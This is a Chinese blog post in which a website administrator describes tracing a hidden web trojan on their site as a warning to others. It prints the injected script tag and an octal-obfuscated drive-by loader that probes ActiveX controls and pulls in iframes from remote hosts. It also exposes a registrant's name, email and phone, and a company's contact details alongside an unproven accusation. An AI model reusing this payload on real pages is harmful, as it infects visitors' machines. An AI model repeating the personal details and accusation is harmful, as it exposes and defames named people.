admin 有一个站被挂马很长时间了,前台页面的马被清掉,但后台的马一直找不到,实在不舒服,准备将这个站自杀掉,但又不甘心,决定再找一次。
花了四个多小时,终于找到了,现贴出来提醒大家注意,大家一定不要点马所在的网址,除非你安装了杀毒软件,光一个360是不行的。
先看这一段代码:
<script language='JavaScript' type='text/JavaScript' src='http://www.w3og.cn/org'></script>
注意其中的'http://www.w3og.cn/org',这是木马网页地址。很有欺骗性,我找过很多次都没注意到。服务器好象是四川乐山电信的,我几乎要拿我自己的服务器与之同归于尽。
再强调一下,贴出来不是要害你啊,不要乱点。
Domain Name: w3og.cn
ROID: 20080213s10001s70391079-cn
Domain Status: ok
Registrant Organization: 陈强
Registrant Name: 陈强
Administrative Email: zhuya22@126.com
Sponsoring Registrar: 北京新网数码信息技术有限公司
Name Server:ns2.xinnet.cn
Name Server:ns2.xinnetdns.com
Registration Date: 2008-02-13 17:16
Expiration Date: 2011-02-13 17:16
http://www.zjedu.gov.cn/TzemailA ... 277010f71e2c65c0027
电子邮件: zhuya22@126.com
联系电话: 0577658796549
联系地址: 电风扇士大夫
提交时间: 2006-12-11
主题: 这样的设施也能办大学???
建议内容: 温职院INTERNET网硬件设施太差 每栋宿舍楼网速一直以来比拨号
上网还慢 ,根本不能满足大学生对TNTER网的需求
交了30元/月的网费却只能上垃圾网络,收了我们的血汗钱却不干人事,气人兮
气人,
学校机房既小又差,还1。5元/小时,我靠 这也叫大学吗??我们学剩
上网只能跑正上的网吧,远又网费又贵,很多同学为了省钱只能玩通宵
温职院的网络设施根本不行,不知道评估团怎么办事的
可笑的是学校还想评全国十大优秀高职 丢死人了
请注意这个公司长沙智之星软件有限公司www.zzstar.cn,这个木马一直为这个站带流量,如果是被陷害的,那还情有可原。如果是同挂马者合作的话,严重鄙视。总经理:廖某某(不贴名字了)
公 司 地 址: 长沙市麓山南路343号(矿山研究院内)902室
联 系 电 话: 0731-2173510 (0)13787116266
邮 政 编 码: 410012
电 子 邮 箱: zzstar888@126.com zzstar168@163.com
公 司 网 址:www.zzstar.cn www.macrorise.com
业务联系QQ:7428377 165635301
另一个受害者的文章:今天学生处的人说他们网页打开就提示有病毒。上去看了一下,果然,打开之后ie有打开其他网页的动作,浏览器很卡,然后跳出一个RealPlayer的窗口,Nod32提示
2008-4-18 16:21:09 HTTP 过滤器 文件 http://user1.33216.net/bak.css Win32/TrojanDownloader.Small.OBJ 特洛伊木马 连接中断 - 已隔离 NIC/Administrator 通过应用程序访问 web 时检测到威胁: C:/Program Files/Maxthon2/Maxthon.exe.
于是开始检查。
费了一番功夫,就不多说了,直接进入主题。
打开Ethereal,对tcp 80端口进行监测,打开Firefox,并清除缓存(如果不清除可能造成不能完全打开)。
完全打开页面后,关闭监测。进行查看。
按照理论来说,应该只有本机与服务器之间的通信,哪么其他IP地址的通信就很可以了。
果然,看到了61.174.63.178这个IP(www.w3og.cn/org),使用Ethereal可以看到具体的URL。
使用FF打开这个网页。
页面是空白的,查看源代码内容如下:
www.w3og.cn/org/
document.write("")
顺藤摸瓜:
其中
www.zzstar.cb/reg/w30.htm
<script language="javascript" src="http://count48.51yes.com/click.aspx?id=485576456&logo=1"></script>
是51yes的一个统计。
http://abc1.315666.net/s22.html
<script language="javascript" type="text/javascript" src="http://js.users.51.la/1793783.js"></script>
第二个页面也是统计,第一个页面就是病毒了。
再次使用FF打开,查看源代码:
<script>window.onerror=function(){return true;}</script>
<script>
window.defaultStatus="完成";
eval("/164/162/171/173/166/141/162/40/145/73/15/12/166/141/162/40/141/144/157/75/50/144/157/143/165/155/145/156/164/56/143/162/145/141/164/145/105/154/145/155/145/156/164/50/42/157/142/152/145/143/164/42/51/51/73/15/12/166/141/162/40/153/141/166/75/42/134/170/64/142/134/170/66/71/134/170/66/145/134/170/66/67/134/170/67/63/134/170/66/146/134/170/66/66/134/170/67/64/42/73/15/12/141/144/157/56/163/145/164/101/164/164/162/151/142/165/164/145/50/42/143/154/141/163/163/151/144/42/54/42/143/154/163/151/144/72/102/104/71/66/103/65/65/66/55/66/65/101/63/55/61/61/104/60/55/71/70/63/101/55/60/60/103/60/64/106/103/62/71/105/63/66/42/51/73/15/12/166/141/162/40/153/141/166/75/42/134/170/64/142/134/170/66/71/134/170/66/145/134/170/66/67/134/170/67/63/134/170/66/146/134/170/66/66/134/170/67/64/42/73/15/12/166/141/162/40/141/163/75/141/144/157/56/143/162/145/141/164/145/157/142/152/145/143/164/50/42/101/144/157/144/142/56/123/164/162/145/141/155/42/54/42/42/51/175/15/12/143/141/164/143/150/50/145/51/173/175/73/15/12/146/151/156/141/154/154/171/173/15/12/151/146/50/145/41/75/42/133/157/142/152/145/143/164/40/105/162/162/157/162/135/42/51/173/15/12/144/157/143/165/155/145/156/164/56/167/162/151/164/145/50/42/74/163/143/162/151/160/164/40/163/162/143/75/150/164/164/160/72/134/57/134/57/165/163/145/162/61/56/63/63/62/61/66/56/156/145/164/134/57/155/163/60/66/60/61/64/56/152/163/76/74/134/57/163/143/162/151/160/164/76/42/51/175/15/12/145/154/163/145/173/15/12/164/162/171/173/40/166/141/162/40/146/73/15/12/166/141/162/40/164/150/165/156/144/145/162/75/156/145/167/40/101/143/164/151/166/145/130/117/142/152/145/143/164/50/42/104/120/103/154/151/145/156/164/56/126/157/144/42/51/73/175/15/12/143/141/164/143/150/50/146/51/173/175/73/15/12/146/151/156/141/154/154/171/173/40/151/146/50/146/41/75/42/133/157/142/152/145/143/164/40/105/162/162/157/162/135/42/51/173/15/12/144/157/143/165/155/145/156/164/56/167/162/151/164/145/50/47/74/151/146/162/141/155/145/40/167/151/144/164/150/75/61/60/60/40/150/145/151/147/150/164/75/60/40/163/162/143/75/150/164/164/160/72/57/57/165/163/145/162/61/56/63/63/62/61/66/56/156/145/164/57/124/150/165/156/144/145/162/56/150/164/155/154/76/74/57/151/146/162/141/155/145/76/47/51/175/175/15/12/164/162/171/173/166/141/162/40/147/73/15/12/166/141/162/40/147/154/167/157/162/154/144/75/156/145/167/40/101/143/164/151/166/145/130/117/142/152/145/143/164/50/42/107/114/103/110/101/124/56/107/114/103/150/141/164/103/164/162/154/56/61/42/51/73/175/15/12/143/141/164/143/150/50/147/51/173/175/73/15/12/146/151/156/141/154/154/171/173/151/146/50/147/41/75/42/133/157/142/152/145/143/164/40/105/162/162/157/162/135/42/51/173/15/12/144/157/143/165/155/145/156/164/56/167/162/151/164/145/50/47/74/151/146/162/141/155/145/40/163/164/171/154/145/75/144/151/163/160/154/141/171/72/156/157/156/145/40/163/162/143/75/42/150/164/164/160/72/57/57/165/163/145/162/61/56/63/63/62/61/66/56/156/145/164/57/107/114/127/117/122/114/104/56/150/164/155/154/42/76/74/57/151/146/162/141/155/145/76/47/51/175/175/15/12/164/162/171/173/166/141/162/40/150/73/15/12/166/141/162/40/163/164/157/162/155/75/156/145/167/40/101/143/164/151/166/145/130/117/142/152/145/143/164/50/42/115/120/123/56/123/164/157/162/155/120/154/141/171/145/162/56/61/42/51/73/175/15/12/143/141/164/143/150/50/150/51/173/175/73/15/12/146/151/156/141/154/154/171/173/151/146/50/150/41/75/42/133/157/142/152/145/143/164/40/105/162/162/157/162/135/42/51/173/15/12/144/157/143/165/155/145/156/164/56/167/162/151/164/145/50/47/74/151/146/162/141/155/145/40/163/164/171/154/145/75/144/151/163/160/154/141/171/72/156/157/156/145/40/163/162/143/75/42/150/164/164/160/72/57/57/165/163/145/162/61/56/63/63/62/61/66/56/156/145/164/57/123/164/157/162/155/111/111/56/150/164/155/154/42/76/74/57/151/146/162/141/155/145/76/47/51/175/175/15/12/164/162/171/173/166/141/162/40/151/73/15/12/166/141/162/40/162/145/141/154/75/156/145/167/40/101/143/164/151/166/145/130/117/142/152/145/143/164/50/42/111/105/122/120/103/164/154/56/111/105/122/120/103/164/154/56/61/42/51/73/175/15/12/143/141/164/143/150/50/151/51/173/175/73/15/12/146/151/156/141/154/154/171/173/151/146/50/151/41/75/42/133/157/142/152/145/143/164/40/105/162/162/157/162/135/42/51/173/15/12/144/157/143/165/155/145/156/164/56/167/162/151/164/145/50/47/74/151/146/162/141/155/145/40/163/164/171/154/145/75/144/151/163/160/154/141/171/72/156/157/156/145/40/163/162/143/75/42/150/164/164/160/72/57/57/165/163/145/162/61/56/63/63/62/61/66/56/156/145/164/57/122/145/141/154/56/150/164/155/154/42/76/74/57/151/146/162/141/155/145/76/47/51/15/12/144/157/143/165/155/145/156/164/56/167/162/151/164/145/50/47/74/163/103/162/111/160/124/40/114/101/156/107/165/101/147/105/75/42/152/101/166/101/163/103/162/111/160/124/42/40/163/162/143/75/150/164/164/160/72/134/57/134/57/165/163/145/162/61/56/63/63/62/61/66/56/156/145/164/134/57/162/145/141/154/56/152/163/76/74/134/57/163/143/162/151/160/164/76/47/51/175/175/15/12/164/162/171/173/166/141/162/40/152/73/15/12/166/141/162/40/102/141/151/144/165/75/156/145/167/40/101/143/164/151/166/145/130/117/142/152/145/143/164/50/42/102/141/151/144/165/102/141/162/56/124/157/157/154/42/51/73/175/15/12/143/141/164/143/150/50/152/51/173/175/73/15/12/146/151/156/141/154/154/171/173/151/146/50/152/41/75/42/133/157/142/152/145/143/164/40/105/162/162/157/162/135/42/51/173/15/12/102/141/151/144/165/133/42/134/170/64/64/134/170/66/143/134/170/66/146/134/170/66/61/134/170/66/64/134/170/64/64/134/170/65/63/42/135/50/42/150/164/164/160/72/57/57/165/163/145/162/61/56/63/63/62/61/66/56/156/145/164/57/102/141/151/144/165/56/143/141/142/42/54/40/42/134/170/64/62/134/170/66/61/134/170/66/71/134/170/66/64/134/170/67/65/134/170/62/145/134/170/66/65/134/170/67/70/134/170/66/65/42/54/40/60/51/175/175/15/12/151/146/50/146/75/75/42/133/157/142/152/145/143/164/40/105/162/162/157/162/135/42/40/46/46/40/147/75/75/42/133/157/142/152/145/143/164/40/105/162/162/157/162/135/42/40/46/46/40/150/75/75/42/133/157/142/152/145/143/164/40/105/162/162/157/162/135/42/40/46/46/40/151/75/75/42/133/157/142/152/145/143/164/40/105/162/162/157/162/135/42/40/46/46/40/152/75/75/42/133/157/142/152/145/143/164/40/105/162/162/157/162/135/42/51/15/12/173/154/157/143/141/164/151/157/156/56/162/145/160/154/141/143/145/50/42/141/142/157/165/164/72/142/154/141/156/153/42/51/73/175/175/175")
/*Extreme*/
</script>
很显然,这个就是病毒源代码了。加密了而且,不管他了。
另外注意到,
http://www.51.la/report/0_help.asp?id=1793783&err=4&help=2
可以看到统计名称。不就是为了一点流量,做这些犯罪的事情,何必呢?
1、使用FF Ethereal。FF不会被这些漏洞利用,而IE基本是一打开就死了。
2、上传的漏洞位于/xgc/AD/200804/1.js,应该是用的动易的漏洞上传的。
3、搜索w3og.cn,基本搜索到的网页,google都会提示是恶意网站...
拥有这个W3og.cn的人的注册信息:
Domain Name: w3og.cn ROID: 20080213s10001s70391079-cn Domain Status: ok Registrant Organization: 陈强 Registrant Name: 陈强 Administrative Email: zhuya22@126.com Sponsoring Registrar: 北京新网数码信息技术有限公司 Name Server:ns2.xinnet.cn Name Server:ns2.xinnetdns.com Registration Date: 2008-02-13 17:16 Expiration Date: 2011-02-13 17:16
这个w3og.cn和zzstar(一家建站公司)显然是有关系的,要不然也不会再木马里面挂上zzstar的流量统计...
微信扫一扫打赏
支付宝扫一扫打赏
评论列表()